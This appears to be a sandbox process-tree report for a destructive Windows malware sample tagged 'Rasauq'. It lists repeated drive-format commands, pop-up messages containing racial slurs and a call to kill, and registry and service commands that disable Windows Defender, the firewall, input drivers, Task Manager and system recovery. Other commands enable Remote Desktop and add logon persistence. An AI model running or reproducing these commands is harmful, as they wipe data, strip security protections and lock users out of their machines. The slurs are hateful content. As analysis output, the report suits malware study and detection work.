  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:292
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5500
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6200
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6296
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6524
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6684
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6716
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6780
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6800
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6812
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6980
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7060
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6272
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6524
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6644
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6864
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7152
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7076
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6444
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6504
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6972
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3528
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6356
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6492
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6640
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6684
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6452
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6660
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6784
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6868
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5712
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6720
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6172
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6256
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4508
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6196
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6496
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6476
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6388
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6772
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6872
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7080
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6640
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6888
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6800
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5696
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6648
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6272
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6456
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6272
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7228
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7328
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7420
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7448
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7496
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7532
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7572
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7584
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7768
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:8016
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:8072
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:8164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7200
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7228
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7352
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7544
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7724
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7792
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:8028
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:8148
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8076
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7180
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7204
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7284
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7308
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7328
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7800
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7648
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8008
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8032
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7956
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8088
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8080
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8180
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7352
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7552
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7644
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7824
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7872
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7648
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7920
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8108
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6812
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7048
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7540
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7416
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7440
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7456
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7928
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7776
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:8032
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7292
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7296
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:8180
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7576
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7412
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7456
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7656
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7872
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7584
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:8028
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6972
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7428
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7580
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7572
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7424
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7336
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:4976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2648
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:5240
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2436
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:3276
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:3960
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:4552
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:468
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:4020
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:5588
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:5804
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1056
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:5312
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:2864
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1556
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5416
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:5140
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:6056
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:5852
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:4892
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:2892
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5412
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:1160
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:1292
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:5360
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:4488
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:608
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5716
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      PID:4180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4048
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:5512
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:3936
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:292
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:644
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:2796
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:3012
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:2968
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:856
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:6072
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:5288
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in Windows directory
      PID:5928
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2504
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2152
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3348
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1032
